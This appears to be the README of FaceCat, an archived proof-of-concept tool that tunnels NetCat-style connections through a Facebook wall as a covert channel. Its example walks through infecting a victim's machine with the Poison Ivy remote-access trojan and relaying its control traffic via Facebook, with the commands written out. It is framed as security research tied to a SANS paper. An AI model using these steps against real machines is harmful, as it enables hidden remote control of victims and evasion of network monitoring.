ARCHIVED! This tool was developed years ago as a proof of concept and it has not been actively mantained, so it may not work with current Facebook platform. Anyway, it is kept public for educational purposes.
FaceCat is cover channel Proof of Concept in Facebook. It is not actively maintained, so please note that it may require some HTML parsing changes. Any pull request with an update is more than welcome. It works similar to the widely known tool NetCat, but
$ ./facecat.py
Usage: facecat.py [options]
Options:
-h, --help show this help message and exit wall pipe account
-w WALL, --wall=WALL wall pipe account
-c HOST --host=HOST connection host
-p PORT --port=PORT listening or connection port
-v --verbose verbose output
-
Help: Just show the help
-
Wall: Email of the master’s wall. It has to be previously configured in order to allow writing on it.
-
Host: FaceCat can work by listening or connecting, as NetCat does. If you chose a host, connection mode is used. If not, listening mode is.
-
Port: Port where FaceCat is listening for new connections, or port to connect to (Host:Port connection).
-
Verbose: Shows each step of the process. Useful for educational purposes.
Example using Poison Ivy:
- Create a Poison Ivy server that will try to connect to 127.0.0.1 at port 3460. We also start a Poison Ivy client listening at the same port.
- Create and configure a FaceBook account in order to write on its wall, for instance
[email protected]
. - Run Internet Explorer and login in our newly created account.
- Run FaceCat in order to read [email protected]’s wall and to relay to our local poison ivy’s client:
$ facecat.py –v –m [email protected] –c 127.0.0.1 –p 3460
- Copy (or infect) FaceCat and Poison Ivy’s server to the victim’s machine.
- Run FaceCat in order to listen to port 3460 in the victim’s machine and to relay to
[email protected]
’s wall:
$ facecat.py –v –m [email protected] –p 3460
- Run Poison Ivy’s client in the victim’s machine.
- Use Poison Ivy normally, but through a FaceBook’s Covert Channel.
Demo: https://youtu.be/C_c8KNvVSVg
Full SANS Paper: https://www.sans.org/reading-room/whitepapers/engineering/covert-channels-social-networks-33960